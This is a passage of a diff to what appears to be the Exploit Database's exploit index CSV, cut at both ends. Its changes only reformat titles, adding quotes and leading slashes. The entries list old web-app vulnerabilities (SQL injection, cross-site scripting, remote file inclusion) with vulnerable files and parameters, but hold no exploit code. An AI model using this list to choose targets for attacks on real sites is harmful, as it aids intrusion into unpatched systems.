System 3.0 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - 'search_listing.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - 'detail.asp?property_id' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 -29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 +29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple SQL Injections",2006-12-02,"Aria-Security Team",asp,webapps,0 @@ -31067,9 +31068,9 @@ id,file,description,date,author,platform,type,port 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections",2006-12-01,ShaFuq31,asp,webapps,0 29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - 'Item_Show.asp?ID2006quant' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 -29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 +29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - 'System SP_Index.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - Listpics.asp SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 -29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 - Thumbs.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 +29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 - 'Thumbs.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - 'filelist.asp' Multiple SQL Injections",2006-11-24,"Aria-Security Team",asp,webapps,0 29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - 'showfile.asp?fid' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29180,platforms/asp/webapps/29180.txt,"SIAP CMS - 'login.asp' SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 @@ -31092,15 +31093,15 @@ id,file,description,date,author,platform,type,port 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - '_410_stats_gone.page.php?app_name' Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - '_referer_spam.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps,0 -29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0 -29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 +29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0 +29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - 'register.php' Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php' IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0 29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0 29231,platforms/asp/webapps/29231.txt,"Dol Storye - 'Dettaglio.asp' Multiple SQL Injections",2006-12-06,WarGame,asp,webapps,0 29232,platforms/php/webapps/29232.txt,"Link CMS - 'navigacija.php?IDMeniGlavni' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29233,platforms/php/webapps/29233.txt,"Link CMS - 'prikazInformacije.php?IDStranicaPodaci' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 -29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 +29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - 'error.php' Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - index.asp SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 29225,platforms/php/webapps/29225.txt,"ac4p Mobile - 'up.php?Taaa' Cross-Site Scripting",2006-12-04,SwEET-DeViL,php,webapps,0 29226,platforms/php/webapps/29226.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2006-12-04,SwEET-DeViL,php,webapps,0 @@ -31114,13 +31115,13 @@ id,file,description,date,author,platform,type,port 29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - 'existepseudo.php?pseudo' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29244,platforms/php/webapps/29244.txt,"Messageriescripthp 2.0 - 'existeemail.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29245,platforms/php/webapps/29245.txt,"Messageriescripthp 2.0 - 'Contact/contact.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - 'admin/admin_membre/fiche_membre.php?idmembre' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29245,platforms/php/webapps/29245.txt,"Messageriescripthp 2.0 - '/Contact/contact.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - '/admin/admin_membre/fiche_membre.php?idmembre' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29247,platforms/php/webapps/29247.txt,"AnnonceScriptHP 2.0 - 'erreurinscription.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - 'Templates/admin.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - 'Templates/commun.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - '/Templates/admin.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - '/Templates/commun.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29250,platforms/php/webapps/29250.txt,"AnnonceScriptHP 2.0 - 'membre.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - 'admin/admin_config/Aide.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - '/admin/admin_config/Aide.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - 'email.php?id' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - 'voirannonce.php?no' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 - index.php3 categories Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -31129,7 +31130,7 @@ id,file,description,date,author,platform,type,port 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 < 4.4 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 29266,platforms/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-Coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 -29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - 'admin/change.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - '/admin/change.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - 'lire-avis.php' aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - 'lire-avis.php' aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 @@ -31138,16 +31139,16 @@ id,file,description,date,author,platform,type,port 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-14,Mr_KaLiMaN,php,webapps,0 -29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - 'mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 +29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,php,webapps,0 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.asp SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 -29298,platforms/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - view.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 -29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c - view.php Viewcategory.php Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps,0 +29298,platforms/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - 'view.php' Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 +29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c - 'view.php Viewcategory.php' Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps,0 29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - Class.TX_RTEHTMLArea_PI1.php Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 29301,platforms/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 - Calendar.jsp Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps,0 -29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 - HTM2PHP.php Directory Traversal",2006-11-08,"the master",php,webapps,0 +29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 - 'HTM2PHP.php' Directory Traversal",2006-11-08,"the master",php,webapps,0 29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps,0 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 @@ -31171,7 +31172,7 @@ id,file,description,date,author,platform,type,port 29334,platforms/cfm/webapps/29334.txt,"Future Internet - 'index.cfm' Multiple SQL Injections",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 -29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - shownews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 +29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - 'shownews.php' Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - 'DIR' Multiple Remote File Inclusions",2006-12-26,Red_Casper,php,webapps,0 29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 @@ -31184,16 +31185,16 @@ id,file,description,date,author,platform,type,port 29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0 -29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0 +29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - 'archive.php' SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0 +29376,platforms/php/webapps/29376.txt,"VCard Pro - 'gbrowse.php' Cross-Site Scripting",2007-01-02,exexp,php,webapps,0 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps,0 29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - 'template.php' HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - FolderManager.aspx Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 -29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp' sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 +29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - 'content.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - 'members.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 -29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - 'applications/SecureLoginManager/inc_secureloginmanager.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 +29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - '/applications/SecureLoginManager/inc_secureloginmanager.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 29363,platforms/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29364,platforms/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29365,platforms/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 @@ -31224,37 +31225,37 @@ id,file,description,date,author,platform,type,port 29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.4.11 - SQL Injection",2007-01-05,DarkFig,php,webapps,0 29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - Orange.asp SQL Injection",2007-01-06,IbnuSina,asp,webapps,0 29401,platforms/asp/webapps/29401.txt,"CreateAuction - Cats.asp SQL Injection",2007-01-08,IbnuSina,asp,webapps,0 -29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - AJAX index.php Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0 -29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 - comment.php SQL Injection",2007-01-09,yorn,php,webapps,0 -29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - 'admin/admin_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - 'admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29409,platforms/php/webapps/29409.txt,"Magic Photo Storage Website - 'admin/admin_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29410,platforms/php/webapps/29410.txt,"Magic Photo Storage Website - 'admin/add_templates.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29411,platforms/php/webapps/29411.txt,"Magic Photo Storage Website - 'admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29412,platforms/php/webapps/29412.txt,"Magic Photo Storage Website - 'admin/approve_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - 'admin/delete_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - 'admin/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - 'admin/list_members.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - 'AJAX index.php' Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0 +29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 - 'comment.php' SQL Injection",2007-01-09,yorn,php,webapps,0 +29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - '/admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29409,platforms/php/webapps/29409.txt,"Magic Photo Storage Website - '/admin/admin_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29410,platforms/php/webapps/29410.txt,"Magic Photo Storage Website - '/admin/add_templates.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29411,platforms/php/webapps/29411.txt,"Magic Photo Storage Website - '/admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29412,platforms/php/webapps/29412.txt,"Magic Photo Storage Website - '/admin/approve_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 40369,platforms/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - 'admin/membership_pricing.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - 'admin/send_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - 'include/config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29419,platforms/php/webapps/29419.txt,"Magic Photo Storage Website - 'include/db_config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29420,platforms/php/webapps/29420.txt,"Magic Photo Storage Website - 'user/add_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29421,platforms/php/webapps/29421.txt,"Magic Photo Storage Website - 'user/add_news.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29422,platforms/php/webapps/29422.txt,"Magic Photo Storage Website - 'user/change_catalog_template.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29423,platforms/php/webapps/29423.txt,"Magic Photo Storage Website - 'user/couple_milestone.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29424,platforms/php/webapps/29424.txt,"Magic Photo Storage Website - 'user/couple_profile.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29425,platforms/php/webapps/29425.txt,"Magic Photo Storage Website - 'user/delete_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29426,platforms/php/webapps/29426.txt,"Magic Photo Storage Website - 'user/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29427,platforms/php/webapps/29427.txt,"Magic Photo Storage Website - 'user/login.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29428,platforms/php/webapps/29428.txt,"Magic Photo Storage Website - 'user/logout.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29429,platforms/php/webapps/29429.txt,"Magic Photo Storage Website - 'user/register.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29430,platforms/php/webapps/29430.txt,"Magic Photo Storage Website - 'user/upload_photo.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29431,platforms/php/webapps/29431.txt,"Magic Photo Storage Website - 'user/user_catelog_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29432,platforms/php/webapps/29432.txt,"Magic Photo Storage Website - 'user/user_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29433,platforms/php/webapps/29433.txt,"Magic Photo Storage Website - 'user/user_extend.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - 'user/user_membership_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29419,platforms/php/webapps/29419.txt,"Magic Photo Storage Website - '/include/db_config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29420,platforms/php/webapps/29420.txt,"Magic Photo Storage Website - '/user/add_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29421,platforms/php/webapps/29421.txt,"Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29422,platforms/php/webapps/29422.txt,"Magic Photo Storage Website - '/user/change_catalog_template.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29423,platforms/php/webapps/29423.txt,"Magic Photo Storage Website - '/user/couple_milestone.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29424,platforms/php/webapps/29424.txt,"Magic Photo Storage Website - '/user/couple_profile.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29425,platforms/php/webapps/29425.txt,"Magic Photo Storage Website - '/user/delete_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29426,platforms/php/webapps/29426.txt,"Magic Photo Storage Website - '/user/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29427,platforms/php/webapps/29427.txt,"Magic Photo Storage Website - '/user/login.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29428,platforms/php/webapps/29428.txt,"Magic Photo Storage Website - '/user/logout.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29429,platforms/php/webapps/29429.txt,"Magic Photo Storage Website - '/user/register.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29430,platforms/php/webapps/29430.txt,"Magic Photo Storage Website - '/user/upload_photo.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29431,platforms/php/webapps/29431.txt,"Magic Photo Storage Website - '/user/user_catelog_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29432,platforms/php/webapps/29432.txt,"Magic Photo Storage Website - '/user/user_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29433,platforms/php/webapps/29433.txt,"Magic Photo Storage Website - '/user/user_extend.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",multiple,webapps,0 29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 29438,platforms/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 @@ -31262,7 +31263,7 @@ id,file,description,date,author,platform,type,port 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron 